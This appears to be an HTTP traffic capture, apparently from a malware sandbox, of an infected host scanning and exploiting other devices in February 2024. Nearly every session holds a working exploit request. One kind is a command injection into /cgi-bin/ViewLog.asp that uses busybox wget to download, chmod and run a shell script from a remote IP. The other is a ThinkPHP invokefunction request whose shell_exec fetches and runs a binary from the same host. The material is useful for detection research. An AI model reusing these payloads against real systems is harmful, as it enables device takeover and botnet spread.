                                                        1281192.168.2.144052294.120.212.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.218539953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1282192.168.2.144771094.187.118.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.223808050 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1283192.168.2.145731895.86.106.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.225033045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1284192.168.2.145579631.149.6.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.408462048 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.667061090 CET1286INHTTP/1.1 404 Not Found
                                                        Server: Mini web server 1.0 ZTE corp 2005.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20
                                                        Data Ascii: <html> <head><title>404 Not Found</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>404 Not Found</h2><span>The requested URL was not found on this server.</span><div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1285192.168.2.145846294.121.194.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.464405060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1286192.168.2.145094894.121.142.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.466311932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1287192.168.2.143960494.187.97.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.473450899 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1288192.168.2.1457638112.163.1.18080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.632240057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1289192.168.2.1450268112.76.169.16280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.694731951 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:57.313971043 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:59.201873064 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:03.169794083 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:10.849602938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1290192.168.2.145507662.29.84.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.978327990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1291192.168.2.144214895.86.122.128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.978400946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.098114967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1292192.168.2.144078295.86.100.2178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:55.978437901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.098037958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1293192.168.2.144336494.238.153.68080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.435412884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.058032036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:58.305938005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1294192.168.2.143302085.237.215.738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.435488939 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:56.640702009 CET396INHTTP/1.0 401 Authentication Required
                                                        WWW-Authenticate: Basic realm="proxy"
                                                        Connection: close
                                                        Content-type: text/html; charset=us-ascii
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1295192.168.2.145572895.99.133.338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.441358089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:56.654721975 CET626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:35:56 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1296192.168.2.143551431.136.10.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:56.451385021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
